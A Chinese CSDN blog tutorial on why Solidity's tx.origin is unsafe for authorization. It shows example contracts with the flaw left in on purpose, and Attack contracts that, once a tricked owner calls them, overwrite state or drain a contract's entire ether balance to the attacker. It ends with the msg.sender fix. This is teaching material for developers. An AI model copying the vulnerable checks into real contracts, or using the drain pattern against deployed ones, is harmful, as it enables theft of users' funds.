Solidity - 安全 - tx.origin

最新推荐文章于 2024-05-24 18:50:58 发布
最新推荐文章于 2024-05-24 18:50:58 发布
阅读量553 收藏 4
点赞数
分类专栏: 智能合约 文章标签: 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ling1998/article/details/125669115
版权
本文通过实例展示了在智能合约中使用tx.origin进行权限验证的风险,包括状态变量篡改和以太币盗窃。黑客可以诱使合约部署者调用恶意合约来绕过tx.origin的验证。解决方案是改用msg.sender进行身份验证,但当合约间调用时可能引发问题。文章提醒开发者注意合约安全,避免使用tx.origin。
摘要由CSDN通过智能技术生成

在官网中对tx.origin有一段描述:

Never use tx.origin for authorization.(永远不要使用tx.origin 做身份认证),即类似验证语句如 require(tx.origin == owner);

先举个简单例子

注:以下示例源码可参见:smartcontract/Security/TxOrigin at main · tracyzhang1998/smartcontract · GitHub

1、示例一 - 修改状态变量

示例源码

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

/// @dev 基础合约
contract BaseContract {
    address owner;
    string message;

    constructor() {
        owner = msg.sender;
    }

    function setMsg(string memory _message) external {
        require(tx.origin == owner, "No permission.");  // 使用tx.origin进行身份验证
        message = _message;
    }

    function getMsg() external view returns (string memory) {
        return message;
    }

    function getOwner() external view returns (address) {
        return owner;
    }
}

/// @dev 攻击合约(黑客编写)
contract Attack {
    BaseContract bc;

    constructor(BaseContract _bcAddr) {
        bc = BaseContract(_bcAddr);
    }

    function attack() external {
        bc.setMsg("The data is attacked.");
    }
}

示例测试

假设合约 BaseContract 是用户 Tracy 编写并已部署的合约,合约中的函数 setMsg 限制只能有部署合约的用户 Tracy 能够修改状态变量message的值。之后黑客用户 Timo 编写了一个攻击合约 Attack (暂时起名明显一些),Timo 通过一些手段骗 Tracy 调用了这个合约中的函数 attack, 此时通过合约 Attack 也修改了合约 BaseContract 中的状态变量message的值。 我们演示一下:

(1)Tracy 部署合约 BaseContract 并通过 setMsg函数 设置 message 的值

(2)黑客 Timo 部署合约 Attack

 (3)黑客 Timo 调用攻击合约 Attack 中的函数 attack

此时会发现,黑客 Timo 自己 调用攻击合约时并不起作用,受到验证限制。

(4)用户 Tracy 调用攻击攻击合约 Attack 中的函数 attack

黑客 Timo 使用一些手段骗取 用户 Tracy 调用攻击合约 Attack 中的函数 attack。

以上仅是一个修改状态值的例子,可能会觉得并没有多大影响,下面我们演示一下盗取以太的例子,这个可是真金白银了吧。

2、示例二 - 盗取以太

示例源码

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

/// @dev 基础合约
contract BaseContract {
    address owner;

    constructor() payable {
        owner = msg.sender;
    }

    function transfer(address payable _to, uint _amount) external {
        require(tx.origin == owner, "No permission.");  // 使用tx.origin进行身份验证
        payable(_to).transfer(_amount);
    }

    function getContractBalance() external view returns (uint) {
        return address(this).balance;
    }

    function getOwner() external view returns (address) {
        return owner;
    }
}

/// @dev 攻击合约(黑客编写)
contract Attack {
    address payable owner;
    BaseContract bc;

    constructor(BaseContract _bcAddr) {
        owner = payable(msg.sender);
        bc = BaseContract(_bcAddr);
    }

    function attack() external {
        bc.transfer(owner, address(bc).balance);
    }

    function getOwnerbalance() external view returns (uint) {
        return address(owner).balance;
    }
}

示例测试 

仍然假设合约 BaseContract 是用户 Tracy 编写并已部署的合约,合约中的函数 transfer 限制只能有部署合约的用户 Tracy 能够进行转账操作。之后黑客用户 Timo 编写了一个攻击合约 Attack (暂时起名明显一些),Timo 通过一些手段骗 Tracy 调用了这个合约中的函数 attack, 此时通过合约 Attack 调用合约 BaseContract 中的转账功能,将合约 BaseContract 账户余额全部转给了 Timo,这下是不是有些恐怖了。 与上面相同的步骤演示一下:

(1)Tracy 部署合约 BaseContract 同时向合约账户转账10Ether

(2)黑客 Timo 部署合约 Attack

(3)黑客 Timo 调用攻击合约 Attack 中的函数 attack

先查看下黑客 Timo 的 账户余额,然后黑客 Timo 自己调用函数 attack,此时会发现,调用攻击合约时并不起作用,受到合约 BaseContract 中 函数 transfer 的验证限制。

(4)用户 Tracy 调用攻击攻击合约 Attack 中的函数 attack 

黑客 Timo 使用一些手段骗取 用户 Tracy 调用攻击合约 Attack 中的函数 attack,合约 BaseContract 账户余额被转至黑客 Timo 账户中了,恐怖啦。

tx.origin 验证前提是黑客需要知道被攻击合约的部署人,当然也可以放长线钓鱼,就是不知道多久用户才会上钩。总之使用tx.origin验证身份是有风险的。

解决方案 

以上两个示例的解决方案都是一样的,即把验证身份的tx.origin改为msg.sender即可:

require(msg.sender == owner, "No permission.");

问题(未解决)

但是有个问题,如果一个合约 CallBaseContract 中的函数调用了基合约 BaseContract,并通过new 方式生成新的合约 BaseContract, 在合约 BaseContract 如果不使用 tx.origin 验证,而使用 msg.sender,msg.sender 值其实为 合约 CallBaseContract 的地址,这样不符合验证要求。先记录下,等待寻找解决方案。合约代码如下:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

/// @dev 基础合约
contract BaseContract {
    address owner;
    string message;

    constructor() {
        owner = tx.origin;
    }

    function setMsg(string memory _message) external {
        require(tx.origin == owner, "No permission.");
        message = _message;
    }

    function getMsg() external view returns (string memory) {
        return message;
    }

    function getOwner() external view returns (address) {
        return owner;
    }
}


/// @dev 调用合约 BaseContract
contract CallBaseContract {
    // 用户账户对应新的合约BaseContract的地址,即一个用户一个基合约地址
    mapping(address => address) userBaseContractAddr;

    function createUserBaseContract(string memory _message) external {
        require(getUserBaseContractAddr(msg.sender) == address(0), "The user already exists.");
        BaseContract bc = new BaseContract();
        userBaseContractAddr[msg.sender] = address(bc);
        BaseContract(address(bc)).setMsg(_message);
    }

    function getUserBaseContractAddr(address _addr) public view returns (address) {
        return userBaseContractAddr[_addr];
    }
}


/// @dev 攻击合约(黑客编写)
contract Attack {

    function attack(BaseContract _bcAddr) external {
        BaseContract bc = BaseContract(_bcAddr);
        bc.setMsg("I already have attacked.");
    }
}

瘦身小蚂蚁
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
几乎所有的 Solidity 合约都有这个安全问题
chinadefi的博客
02-22 434
几乎所有的 Solidity 合约都有这个安全问题 几乎所有的Solidity合约都有这个安全问题,有些合约比其他的更严重。这个问题是Solidity编译器固有的。考虑在Solidity中实现映射: mapping(uint256 => bytes32) mapping1; 生成的存储地址总是在0` – 2**256-1范围内。没有数学上的保证可以确定其没有冲突。事实上,在这个范围内证明冲突的存在是很容易的。 Pseudo-Demonstration 考虑定义在N1范围内的keccak256函数k
Solidity-中文-develop.zip
12-17
Solidity develop 文档(开发版) Solidity 是一门面向合约的、为实现智能合约而创建的高级编程语言。这门语言受到了 C++,Python 和 Javascript 语言的影响,设计的目的是能在以太坊虚拟机(EVM)上运行。 Solidity...
solidity智能合约tx.origin的正确使用场景
chunxie2315的博客
07-18 392
简介 tx.originSolidity的一个全局变量,它遍历整个调用栈并返回最初发送调用(或事务)的帐户的地址。在智能合约中使用此变量进行身份验证会使合约容易受到类似网络钓鱼的攻击。 但针对tx.origin的使用并不用谈虎色变,正确的使用还是有它的应用场景的。 漏洞详解 漏洞合约 在如下...
理解Solidity 中的 tx.origin 和 msg.sender
最新发布
Spade_sec的博客
05-24 688
开发者需要了解在Soliditytx.origin和msg.sender的区别。这两个全局变量经常被混淆,尽管它们之间有着根本的不同。虽然乍一看它们可能相似,但在交易的上下文中,tx.origin和msg.sender代表不同的地址。在这篇博客文章中,我们将深入探讨这些变量的含义。
安全考量——Solidity中文文档(5)
weixin_34018169的博客
04-17 199
写在前面:HiBlock区块链社区成立了翻译小组,翻译区块链相关的技术文档及资料,本文为Solidity文档翻译的第五部分《安全考量》,特发布出来邀请solidity爱好者、开发者做公开的审校,您可以添加微信baobaotalk_com,验证输入“solidity”,然后将您的意见和建议发送给我们,也可以在文末“留言”区留言,有效的建议我们会采纳及合并进下一版本,同时将送一份小礼物给您以示感谢。...
soliditytx.origin是一个全局变量,返回发送交易的账户地址。
wuygh的博客
01-10 355
soliditytx.origin是一个全局变量,返回发送交易的账户地址。
Solidity-中文-stable.zip
12-17
Solidity develop 文档(稳定版) Solidity 是一门面向合约的、为实现智能合约而创建的高级编程语言。这门语言受到了 C++,Python 和 Javascript 语言的影响,设计的目的是能在以太坊虚拟机(EVM)上运行。 Solidity...
Intellij-Solidity-2.3.7.zip
12-02
"IntelliJ-Solidity-2.3.7.zip" 是一个扩展了IntelliJ IDEA功能的插件包,专为Solidity开发者设计。这个版本号2.3.7意味着它是该插件的一个特定更新,可能包含了性能改进、新特性或对先前版本错误的修复。 该插件...
solidity-auction-master.zip
05-09
以太坊拍卖dapp这是一个简单的拍卖平台。您可以创建新的拍卖,设置开始和结束时间(以及出价增量),使用ETH出价以及提取资金。 我使用ConsenSys的truffle -webpack-demo作为起点,因为这里使用的各种库之间都需要...
solidity-parser:JavaScript中的Solidity解析器
04-30
var SolidityParser = require ( "solidity-parser" ) ; // Parse Solidity code as a string: var result = SolidityParser . parse ( "contract { ... }" ) ; // Or, parse a file: var result = SolidityParser ...
Tx.Origin 用作身份验证
weixin_33738555的博客
10-30 1203
Solidity 中有一个全局变量,tx.origin,它遍历整个调用栈并返回最初发送调用(或交易)的帐户的地址。在智能合约中使用此变量进行身份验证会使合约容易受到类似网络钓鱼的攻击。 有关进一步阅读,请参阅Stack Exchange Question,Peter Venesses 的博客和SolidityTx.Origin 攻击。 1 漏洞 授权用户使用tx.origin变量的合约通常容...
Solidity安全性问题
qq_40428105的博客
09-29 391
1、外部调用: 尽量避免外部调用 分析“send()”,"transfer()","call.value()" x.transfer()和if(!x.send(y)) throw;等价,send是transfer的底层实现,尽量直接使用transfer someAddress.send()和someAddress.transfer()能保证可重入安全。这些外部智能合约能够被出发执行,但是...
Solidity安全贴士(一)
hello,是翠花呀
08-08 255
开发前的准备 基本理念 开发智能合约需要一个全新的工程思维,它不同于我们以往项目的开发,因为一旦它出错将付出巨大的代价,并且很难像传统软件那样轻易的打上补丁。就像直接给硬件编程或金融服务类软件开发,相比于web开发和移动开发都有更大的挑战。所以不能够仅仅防范已知的安全漏洞。 预知错误: 代码必须能够正确的处理出现的bug和漏洞。当智能合约出现错误时,停止合约,管理账户的资金风险(限制...
tx.origin攻击
Timmbe的博客
02-22 3786
tx.origin攻击
Solidity 安全:已知攻击方法和常见防御模式综合列表
Fly_鹏程万里
02-01 2764
虽然处于起步阶段,但是 Solidity 已被广泛采用,并被用于编译我们今天看到的许多以太坊智能合约中的字节码。相应地,开发者和用户也获得许多严酷的教训,例如发现语言和EVM的细微差别。这篇文章旨在作为一个相对深入和最新的介绍性文章,详述 Solidity 开发人员曾经踩过的坑,避免后续开发者重蹈覆辙。   重入漏洞 以太坊智能合约的特点之一是能够调用和利用其他外部合约的代码。合约通常也...
tx.origin 与 msg.sender
qq_42200107的博客
09-19 3295
web3/solidity 游戏,在第 4 级上,我浪费了几分钟来了解 tx.origin 和 msg.sender 之间的区别,它们在solidity 中构建全局变量。您可能会注意到,账户地址和智能合约地址都可以是 msg.sender 但 tx.origin 将始终是账户/钱包地址。,tx.origin 保存交易发送者的地址,msg.sender 保存消息发送者的地址。指调用智能合约函数的账户地址,只有账户地址可以是tx.origin。最近损失了 800 万美元,是的,由于。一张图片胜过千言万语。
智能合约编程/Dapp漏洞 -- 交易授权/Tx.Origin Authentication
sooxin的专栏
04-23 617
Solidity有一个全局变量tx.origin, 它回溯整个调用栈返回最初的,真正发起调用/交易的账户地址。在智能合约里使用这个变量做用户验证的话,就会留下一个受钓鱼攻击的漏洞。可以看这个Stack Exchange问答: Peter Venesses’s Blog and SolidityTx.Origin attacks(https://medium.com/coinmonks/solidity-tx-origin-attacks-58211ad95514)。 攻击原理 如果一个合约使用tx
No such file or directory: 'C:\\Users\\admin\\Desktop\\a\\extension-output-hosho.solidity-debugger-#1-Meadow Solidity Debugger'
03-14
这个错误提示表明你试图访问的文件 'C:\Users\admin\Desktop\a\extension-output-hosho.solidity-debugger-#1-Meadow Solidity Debugger' 不存在 这可能有以下几个原因: 1. 文件确实不存在于指定的路径下你可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值